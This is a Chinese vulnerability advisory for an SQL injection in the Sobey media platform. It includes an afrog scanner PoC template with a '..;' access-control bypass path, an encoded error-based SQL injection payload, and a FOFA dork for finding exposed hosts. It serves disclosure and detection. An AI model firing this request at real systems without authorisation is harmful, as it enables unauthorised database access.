suobei-rongmeiti-countjzt-articlegroupbychannel2-sqli: 索贝融媒体countJztArticleGroupByChannel2 SQL注入漏洞

日期: 2025-09-01 | 影响软件: 索贝融媒体 | POC: 已公开

漏洞描述

索贝产品中的 /sobey-mchEditor/mch/Jzt/statistics/countJztArticleGroupByChannel2 接口存在SQL注入漏洞,攻击者可以通过构造恶意的SQL语句,获取数据库中的敏感信息,甚至可能导致数据库被完全控制 fofa:icon_hash="689611853"||app="SOBEY-融媒体" || body="You need to enable JavaScript to run this app" && header="Sobey"

PoC代码[已公开]

id: suobei-rongmeiti-countjzt-articlegroupbychannel2-sqli

info:
  name: 索贝融媒体countJztArticleGroupByChannel2 SQL注入漏洞
  author: avic123
  severity: high
  verified: true
  description: |-
    索贝产品中的 /sobey-mchEditor/mch/Jzt/statistics/countJztArticleGroupByChannel2 接口存在SQL注入漏洞,攻击者可以通过构造恶意的SQL语句,获取数据库中的敏感信息,甚至可能导致数据库被完全控制
    fofa:icon_hash="689611853"||app="SOBEY-融媒体" || body="You need to enable JavaScript to run this app" && header="Sobey"
  reference:
    - https://mrxn.net/jswz/sobey-Jzt-statistics-countJztArticleGroupByChannel2-sqli.html
  tags: suobei,sqli
  created: 2025/09/15

rules:
  r0:
    request:
      method: GET
      path: /sobey-mchEditor/js/..;/mch/Jzt/statistics/countJztArticleGroupByChannel2?siteCode=&token=&userCode=admin&channelId=1&catalogid=1&channelId=%31%20%41%4e%44%20%47%54%49%44%5f%53%55%42%53%45%54%28%43%4f%4e%43%41%54%28%30%78%37%31%37%61%36%61%36%62%37%31%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%30%32%37%3d%36%30%32%37%2c%31%29%29%29%2c%30%78%37%31%37%31%37%30%37%31%37%31%29%2c%36%30%32%37%29
    expression: |
      response.status == 500  && response.body.bcontains(b'qzjkq1')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/suobei-rongmeiti-countjzt-articlegroupbychannel2-sqli.yaml

相关漏洞推荐